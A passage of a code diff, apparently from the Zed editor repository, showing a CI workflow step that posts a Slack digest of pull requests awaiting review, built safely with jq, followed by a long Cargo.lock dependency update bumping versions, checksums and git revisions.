+          # Build the Block Kit payload entirely with jq — PR titles are
+          # attacker-controllable, so they are never interpolated into shell
+          # commands. jq -r reads them from the JSON file and jq --arg re-injects
+          # them, keeping the content JSON-encoded in the final payload.
+ PRS=$(jq -r '.[] | "• <https://github.com/'"${REPO}"'/pull/\(.number)|#\(.number)> — \(.title) (by \(.author), opened \(.created_at | split("T")[0]))"' /tmp/awaiting.json)
+
+ jq -n \
+ --arg count "$COUNT" \
+ --arg prs "$PRS" \
+ '{
+ text: ($count + " PR(s) awaiting review for >72 hours"),
+ blocks: [
+ {
+ type: "section",
+ text: {
+ type: "mrkdwn",
+ text: (":hourglass_flowing_sand: *" + $count + " PR(s) Awaiting Review >72 Hours*")
+ }
+ },
+ {
+ type: "section",
+ text: { type: "mrkdwn", text: $prs }
+ },
+ { type: "divider" },
+ {
+ type: "context",
+ elements: [{
+ type: "mrkdwn",
+ text: "PRs awaiting review are surfaced daily. Reviewers: pick one up or reassign."
+ }]
+ }
+ ]
+ }' | \
+ curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \
+ -H 'Content-Type: application/json' \
+ -d @-
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -228,9 +228,9 @@ dependencies = [
[[package]]
name = "agent-client-protocol"
-version = "0.9.4"
+version = "0.10.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2659b1089101b15db31137710159421cb44785ecdb5ba784be3b4a6f8cb8a475"
+checksum = "9c56a59cf6315e99f874d2c1f96c69d2da5ffe0087d211297fc4a41f849770a2"
dependencies = [
"agent-client-protocol-schema",
"anyhow",
@@ -245,16 +245,16 @@ dependencies = [
[[package]]
name = "agent-client-protocol-schema"
-version = "0.10.8"
+version = "0.11.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "44bc1fef9c32f03bce2ab44af35b6f483bfd169bf55cc59beeb2e3b1a00ae4d1"
+checksum = "e0497b9a95a404e35799904835c57c6f8c69b9d08ccfd3cb5b7d746425cd6789"
dependencies = [
"anyhow",
"derive_more",
"schemars",
"serde",
"serde_json",
- "strum 0.27.2",
+ "strum 0.28.0",
]
[[package]]
@@ -272,6 +272,7 @@ dependencies = [
"collections",
"credentials_provider",
"env_logger 0.11.8",
+ "feature_flags",
"fs",
"futures 0.3.31",
"google_ai",
@@ -334,7 +335,6 @@ dependencies = [
"agent_settings",
"ai_onboarding",
"anyhow",
- "arrayvec",
"assistant_slash_command",
"assistant_slash_commands",
"assistant_text_thread",
@@ -363,6 +363,7 @@ dependencies = [
"git",
"gpui",
"gpui_tokio",
+ "heapless",
"html_to_markdown",
"http_client",
"image",
@@ -662,7 +663,6 @@ dependencies = [
"schemars",
"serde",
"serde_json",
- "settings",
"strum 0.27.2",
"thiserror 2.0.17",
]
@@ -734,9 +734,6 @@ name = "arrayvec"
version = "0.7.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "7c02d123df017efcdfbd739ef81735b36c5ba83ec3c59c80a9d7ecc718f92e50"
-dependencies = [
- "serde",
-]
[[package]]
name = "as-raw-xcb-connection"
@@ -1282,7 +1279,6 @@ name = "audio"
version = "0.1.0"
dependencies = [
"anyhow",
- "async-tar",
"collections",
"cpal",
"crossbeam",
@@ -1294,7 +1290,6 @@ dependencies = [
"rodio",
"serde",
"settings",
- "smol",
"thiserror 2.0.17",
"util",
]
@@ -2074,7 +2069,16 @@ version = "0.8.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "08807e080ed7f9d5433fa9b275196cfc35414f66a0c79d864dc51a0d825231a3"
dependencies = [
- "bit-vec",
+ "bit-vec 0.8.0",
+]
+
+[[package]]
+name = "bit-set"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "34ddef2995421ab6a5c779542c81ee77c115206f4ad9d5a8e05f4ff49716a3dd"
+dependencies = [
+ "bit-vec 0.9.1",
]
[[package]]
@@ -2083,6 +2087,12 @@ version = "0.8.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7"
+[[package]]
+name = "bit-vec"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b71798fca2c1fe1086445a7258a4bc81e6e49dcd24c8d0dd9a1e57395b603f51"
+
[[package]]
name = "bit_field"
version = "0.10.3"
@@ -2194,7 +2204,7 @@ version = "3.8.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "89ec27229c38ed0eb3c0feee3d2c1d6a4379ae44f418a29a658890e062d8f365"
dependencies = [
- "darling",
+ "darling 0.21.3",
"ident_case",
"prettyplease",
"proc-macro2",
@@ -2460,7 +2470,7 @@ version = "0.25.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "9225bdcf4e4a9a4c08bf16607908eb2fbf746828d5e0b5e019726dbf6571f201"
dependencies = [
- "darling",
+ "darling 0.20.11",
"proc-macro2",
"quote",
"syn 2.0.117",
@@ -3164,17 +3174,6 @@ dependencies = [
"objc",
]
-[[package]]
-name = "codespan-reporting"
-version = "0.12.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "fe6d2e5af09e8c8ad56c969f2157a3d4238cebc7c55f0a517728c38f7b200f81"
-dependencies = [
- "serde",
- "termcolor",
- "unicode-width",
-]
-
[[package]]
name = "codespan-reporting"
version = "0.13.0"
@@ -3320,6 +3319,7 @@ dependencies = [
"futures 0.3.31",
"fuzzy",
"gpui",
+ "livekit_client",
"log",
"menu",
"notifications",
@@ -3339,6 +3339,7 @@ dependencies = [
"ui",
"util",
"workspace",
+ "zed_actions",
]
[[package]]
@@ -3570,6 +3571,7 @@ version = "0.1.0"
dependencies = [
"anyhow",
"async-trait",
+ "base64 0.22.1",
"collections",
"futures 0.3.31",
"gpui",
@@ -3578,14 +3580,17 @@ dependencies = [
"net",
"parking_lot",
"postage",
+ "rand 0.9.2",
"schemars",
"serde",
"serde_json",
"settings",
+ "sha2",
"slotmap",
"smol",
"tempfile",
"terminal",
+ "tiny_http",
"url",
"util",
]
@@ -4397,7 +4402,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "d74b6bcf49ebbd91f1b1875b706ea46545032a14003b5557b7dfa4bbeba6766e"
dependencies = [
"cc",
- "codespan-reporting 0.13.0",
+ "codespan-reporting",
"indexmap",
"proc-macro2",
"quote",
@@ -4412,7 +4417,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "94ca2ad69673c4b35585edfa379617ac364bccd0ba0adf319811ba3a74ffa48a"
dependencies = [
"clap",
- "codespan-reporting 0.13.0",
+ "codespan-reporting",
"indexmap",
"proc-macro2",
"quote",
@@ -4514,8 +4519,18 @@ version = "0.20.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "fc7f46116c46ff9ab3eb1597a45688b6715c6e628b5c133e288e709a29bcb4ee"
dependencies = [
- "darling_core",
- "darling_macro",
+ "darling_core 0.20.11",
+ "darling_macro 0.20.11",
+]
+
+[[package]]
+name = "darling"
+version = "0.21.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9cdf337090841a411e2a7f3deb9187445851f91b309c0c0a29e05f74a00a48c0"
+dependencies = [
+ "darling_core 0.21.3",
+ "darling_macro 0.21.3",
]
[[package]]
@@ -4532,13 +4547,38 @@ dependencies = [
"syn 2.0.117",
]
+[[package]]
+name = "darling_core"
+version = "0.21.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1247195ecd7e3c85f83c8d2a366e4210d588e802133e1e355180a9870b517ea4"
+dependencies = [
+ "fnv",
+ "ident_case",
+ "proc-macro2",
+ "quote",
+ "strsim",
+ "syn 2.0.117",
+]
+
[[package]]
name = "darling_macro"
version = "0.20.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "fc34b93ccb385b40dc71c6fceac4b2ad23662c7eeb248cf10d529b7e055b6ead"
dependencies = [
- "darling_core",
+ "darling_core 0.20.11",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "darling_macro"
+version = "0.21.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d38308df82d1080de0afee5d069fa14b0326a88c14f15c5ccda35b4a6c414c81"
+dependencies = [
+ "darling_core 0.21.3",
"quote",
"syn 2.0.117",
]
@@ -4582,6 +4622,7 @@ dependencies = [
"anyhow",
"gpui",
"indoc",
+ "inventory",
"log",
"paths",
"release_channel",
@@ -4590,6 +4631,7 @@ dependencies = [
"sqlez_macros",
"tempfile",
"util",
+ "uuid",
"zed_env_vars",
]
@@ -4809,11 +4851,11 @@ dependencies = [
[[package]]
name = "derive_setters"
-version = "0.1.8"
+version = "0.1.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "ae5c625eda104c228c06ecaf988d1c60e542176bd7a490e60eeda3493244c0c9"
+checksum = "b7e6f6fa1f03c14ae082120b84b3c7fbd7b8588d924cf2d7c3daf9afd49df8b9"
dependencies = [
- "darling",
+ "darling 0.21.3",
"proc-macro2",
"quote",
"syn 2.0.117",
@@ -5196,7 +5238,6 @@ version = "0.1.0"
dependencies = [
"ai_onboarding",
"anyhow",
- "arrayvec",
"brotli",
"buffer_diff",
"client",
@@ -5214,6 +5255,7 @@ dependencies = [
"fs",
"futures 0.3.31",
"gpui",
+ "heapless",
"indoc",
"itertools 0.14.0",
"language",
@@ -5263,6 +5305,7 @@ dependencies = [
"client",
"cloud_llm_client",
"collections",
+ "db",
"debug_adapter_extension",
"dirs 4.0.0",
"edit_prediction",
@@ -6143,7 +6186,18 @@ version = "0.16.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "998b056554fbe42e03ae0e152895cd1a7e1002aec800fdc6635d20270260c46f"
dependencies = [
- "bit-set",
+ "bit-set 0.8.0",
+ "regex-automata",
+ "regex-syntax",
+]
+
+[[package]]
+name = "fancy-regex"
+version = "0.17.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "72cf461f865c862bb7dc573f643dd6a2b6842f7c30b07882b56bd148cc2761b8"
+dependencies = [
+ "bit-set 0.8.0",
"regex-automata",
"regex-syntax",
]
@@ -6213,7 +6267,6 @@ dependencies = [
name = "feature_flags"
version = "0.1.0"
dependencies = [
- "futures 0.3.31",
"gpui",
]
@@ -6244,6 +6297,8 @@ name = "file_finder"
version = "0.1.0"
dependencies = [
"anyhow",
+ "channel",
+ "client",
"collections",
"ctor",
"editor",
@@ -6257,10 +6312,10 @@ dependencies = [
"pretty_assertions",
"project",
"project_panel",
+ "remote_connection",
"serde",
"serde_json",
"settings",
- "text",
"theme",
"ui",
"util",
@@ -6547,6 +6602,7 @@ dependencies = [
"async-trait",
"cocoa 0.26.0",
"collections",
+ "dunce",
"fs",
"futures 0.3.31",
"git",
@@ -7142,7 +7198,7 @@ dependencies = [
[[package]]
name = "gh-workflow"
version = "0.8.0"
-source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac"
+source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f"
dependencies = [
"async-trait",
"derive_more",
@@ -7153,13 +7209,13 @@ dependencies = [
"serde",
"serde_json",
"serde_yaml",
- "strum_macros",
+ "strum_macros 0.27.2",
]
[[package]]
name = "gh-workflow-macros"
version = "0.8.0"
-source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac"
+source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f"
dependencies = [
"heck 0.5.0",
"quote",
@@ -7319,6 +7375,7 @@ dependencies = [
"db",
"editor",
"feature_flags",
+ "file_icons",
"futures 0.3.31",
"fuzzy",
"git",
@@ -7455,9 +7512,9 @@ dependencies = [
[[package]]
name = "glow"
-version = "0.16.0"
+version = "0.17.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c5e5ea60d70410161c8bf5da3fdfeaa1c72ed2c15f8bbb9d19fe3a4fad085f08"
+checksum = "29038e1c483364cc6bb3cf78feee1816002e127c331a1eec55a4d202b9e1adb5"
dependencies = [
"js-sys",
"slotmap",
@@ -7483,6 +7540,7 @@ dependencies = [
"indoc",
"language",
"menu",
+ "multi_buffer",
"project",
"rope",
"serde",
@@ -7609,7 +7667,7 @@ dependencies = [
"mach2 0.5.0",
"media",
"metal",
- "naga 28.0.0",
+ "naga 29.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
"num_cpus",
"objc",
"objc2",
@@ -7969,6 +8027,15 @@ dependencies = [
"smallvec",
]
+[[package]]
+name = "hash32"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "47d60b12902ba28e2730cd37e95b8c9223af2808df9e902d4df49588d1470606"
+dependencies = [
+ "byteorder",
+]
+
[[package]]
name = "hashbrown"
version = "0.12.3"
@@ -8053,6 +8120,16 @@ dependencies = [
"http 0.2.12",
]
+[[package]]
+name = "heapless"
+version = "0.9.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2af2455f757db2b292a9b1768c4b70186d443bcb3b316252d6b540aec1cd89ed"
+dependencies = [
+ "hash32",
+ "stable_deref_trait",
+]
+
[[package]]
name = "heck"
version = "0.3.3"
@@ -9114,7 +9191,7 @@ dependencies = [
"bytecount",
"data-encoding",
"email_address",
- "fancy-regex",
+ "fancy-regex 0.16.2",
"fraction",
"getrandom 0.3.4",
"idna",
@@ -9408,7 +9485,6 @@ dependencies = [
"aws_http_client",
"base64 0.22.1",
"bedrock",
- "chrono",
"client",
"cloud_api_types",
"cloud_llm_client",
@@ -9437,6 +9513,7 @@ dependencies = [
"ollama",
"open_ai",
"open_router",
+ "opencode",
"partial-json-fixer",
"pretty_assertions",
"release_channel",
@@ -9722,7 +9799,7 @@ dependencies = [
[[package]]
name = "libwebrtc"
version = "0.3.26"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"cxx",
"glib",
@@ -9820,7 +9897,7 @@ checksum = "11d3d7f243d5c5a8b9bb5d6dd2b1602c0cb0b9db1621bafc7ed66e35ff9fe092"
[[package]]
name = "livekit"
version = "0.7.32"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"base64 0.22.1",
"bmrng",
@@ -9846,7 +9923,7 @@ dependencies = [
[[package]]
name = "livekit-api"
version = "0.4.14"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"base64 0.21.7",
"futures-util",
@@ -9873,7 +9950,7 @@ dependencies = [
[[package]]
name = "livekit-protocol"
version = "0.7.1"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"futures-util",
"livekit-runtime",
@@ -9889,7 +9966,7 @@ dependencies = [
[[package]]
name = "livekit-runtime"
version = "0.4.0"
-source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459"
+source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e"
dependencies = [
"tokio",
"tokio-stream",
@@ -9944,8 +10021,10 @@ dependencies = [
"settings",
"simplelog",
"smallvec",
+ "tokio",
"ui",
"util",
+ "webrtc-sys",
"zed-scap",
]
@@ -10199,7 +10278,6 @@ dependencies = [
"async-recursion",
"collections",
"editor",
- "fs",
"gpui",
"html5ever 0.27.0",
"language",
@@ -10211,6 +10289,7 @@ dependencies = [
"pretty_assertions",
"pulldown-cmark 0.13.0",
"settings",
+ "stacksafe",
"theme",
"ui",
"urlencoding",
@@ -10710,16 +10789,16 @@ checksum = "e5ce46fe64a9d73be07dcbe690a38ce1b293be448fd8ce1e6c1b8062c9f72c6a"
[[package]]
name = "naga"
-version = "28.0.0"
+version = "29.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "618f667225063219ddfc61251087db8a9aec3c3f0950c916b614e403486f1135"
+checksum = "85b4372fed0bd362d646d01b6926df0e837859ccc522fed720c395e0460f29c8"
dependencies = [
"arrayvec",
- "bit-set",
+ "bit-set 0.9.1",
"bitflags 2.10.0",
"cfg-if",
"cfg_aliases 0.2.1",
- "codespan-reporting 0.12.0",
+ "codespan-reporting",
"half",
"hashbrown 0.16.1",
"hexf-parse",
@@ -10735,15 +10814,15 @@ dependencies = [
[[package]]
name = "naga"
-version = "28.0.1"
-source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4"
+version = "29.0.0"
+source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575"
dependencies = [
"arrayvec",
- "bit-set",
+ "bit-set 0.9.1",
"bitflags 2.10.0",
"cfg-if",
"cfg_aliases 0.2.1",
- "codespan-reporting 0.12.0",
+ "codespan-reporting",
"half",
"hashbrown 0.16.1",
"hexf-parse",
@@ -11273,9 +11352,9 @@ dependencies = [
[[package]]
name = "objc2-audio-toolbox"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "10cbe18d879e20a4aea544f8befe38bcf52255eb63d3f23eca2842f3319e4c07"
+checksum = "6948501a91121d6399b79abaa33a8aa4ea7857fe019f341b8c23ad6e81b79b08"
dependencies = [
"bitflags 2.10.0",
"libc",
@@ -11288,9 +11367,9 @@ dependencies = [
[[package]]
name = "objc2-avf-audio"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bfc1d11521c211a7ebe17739fc806719da41f56c6b3f949d9861b459188ce910"
+checksum = "13a380031deed8e99db00065c45937da434ca987c034e13b87e4441f9e4090be"
dependencies = [
"objc2",
"objc2-foundation",
@@ -11298,9 +11377,9 @@ dependencies = [
[[package]]
name = "objc2-core-audio"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "ca44961e888e19313b808f23497073e3f6b3c22bb485056674c8b49f3b025c82"
+checksum = "e1eebcea8b0dbff5f7c8504f3107c68fc061a3eb44932051c8cf8a68d969c3b2"
dependencies = [
"dispatch2",
"objc2",
@@ -11340,9 +11419,9 @@ checksum = "ef25abbcd74fb2609453eb695bd2f860d389e457f67dc17cafc8b8cbc89d0c33"
[[package]]
name = "objc2-foundation"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "900831247d2fe1a09a683278e5384cfb8c80c79fe6b166f9d14bfdde0ea1b03c"
+checksum = "e3e0adef53c21f888deb4fa59fc59f7eb17404926ee8a6f59f5df0fd7f9f3272"
dependencies = [
"bitflags 2.10.0",
"block2",
@@ -11363,9 +11442,9 @@ dependencies = [
[[package]]
name = "objc2-metal"
-version = "0.3.1"
+version = "0.3.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7f246c183239540aab1782457b35ab2040d4259175bd1d0c58e46ada7b47a874"
+checksum = "a0125f776a10d00af4152d74616409f0d4a2053a6f57fa5b7d6aa2854ac04794"
dependencies = [
"bitflags 2.10.0",
"block2",
@@ -11375,6 +11454,19 @@ dependencies = [
"objc2-foundation",
]
+[[package]]
+name = "objc2-quartz-core"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "96c1358452b371bf9f104e21ec536d37a650eb10f7ee379fff67d2e08d537f1f"
+dependencies = [
+ "bitflags 2.10.0",
+ "objc2",
+ "objc2-core-foundation",
+ "objc2-foundation",
+ "objc2-metal",
+]
+
[[package]]
name = "objc_exception"
version = "0.1.2"
@@ -11573,6 +11665,20 @@ dependencies = [
"thiserror 2.0.17",
]
+[[package]]
+name = "opencode"
+version = "0.1.0"
+dependencies = [
+ "anyhow",
+ "futures 0.3.31",
+ "google_ai",
+ "http_client",
+ "schemars",
+ "serde",
+ "serde_json",
+ "strum 0.27.2",
+]
+
[[package]]
name = "opener"
version = "0.7.2"
@@ -12082,7 +12188,7 @@ dependencies = [
[[package]]
name = "pet"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"clap",
"env_logger 0.10.2",
@@ -12113,14 +12219,18 @@ dependencies = [
"pet-virtualenvwrapper",
"pet-windows-registry",
"pet-windows-store",
+ "pet-winpython",
"serde",
"serde_json",
+ "tracing",
+ "tracing-subscriber",
+ "winresource",
]
[[package]]
name = "pet-conda"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"lazy_static",
@@ -12130,6 +12240,7 @@ dependencies = [
"pet-fs",
"pet-python-utils",
"pet-reporter",
+ "rayon",
"regex",
"serde",
"serde_json",
@@ -12139,7 +12250,7 @@ dependencies = [
[[package]]
name = "pet-core"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"clap",
"lazy_static",
@@ -12154,7 +12265,7 @@ dependencies = [
[[package]]
name = "pet-env-var-path"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12170,8 +12281,9 @@ dependencies = [
[[package]]
name = "pet-fs"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
+ "glob",
"log",
"msvc_spectre_libs",
"windows-sys 0.59.0",
@@ -12180,7 +12292,7 @@ dependencies = [
[[package]]
name = "pet-global-virtualenvs"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12193,7 +12305,7 @@ dependencies = [
[[package]]
name = "pet-homebrew"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12203,6 +12315,7 @@ dependencies = [
"pet-fs",
"pet-python-utils",
"pet-virtualenv",
+ "rayon",
"regex",
"serde",
"serde_json",
@@ -12211,7 +12324,7 @@ dependencies = [
[[package]]
name = "pet-jsonrpc"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"log",
@@ -12224,7 +12337,7 @@ dependencies = [
[[package]]
name = "pet-linux-global-python"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12237,7 +12350,7 @@ dependencies = [
[[package]]
name = "pet-mac-commandlinetools"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12250,7 +12363,7 @@ dependencies = [
[[package]]
name = "pet-mac-python-org"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12263,7 +12376,7 @@ dependencies = [
[[package]]
name = "pet-mac-xcode"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12276,20 +12389,22 @@ dependencies = [
[[package]]
name = "pet-pipenv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
+ "lazy_static",
"log",
"msvc_spectre_libs",
"pet-core",
"pet-fs",
"pet-python-utils",
"pet-virtualenv",
+ "regex",
]
[[package]]
name = "pet-pixi"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12301,7 +12416,7 @@ dependencies = [
[[package]]
name = "pet-poetry"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"base64 0.22.1",
"lazy_static",
@@ -12322,7 +12437,7 @@ dependencies = [
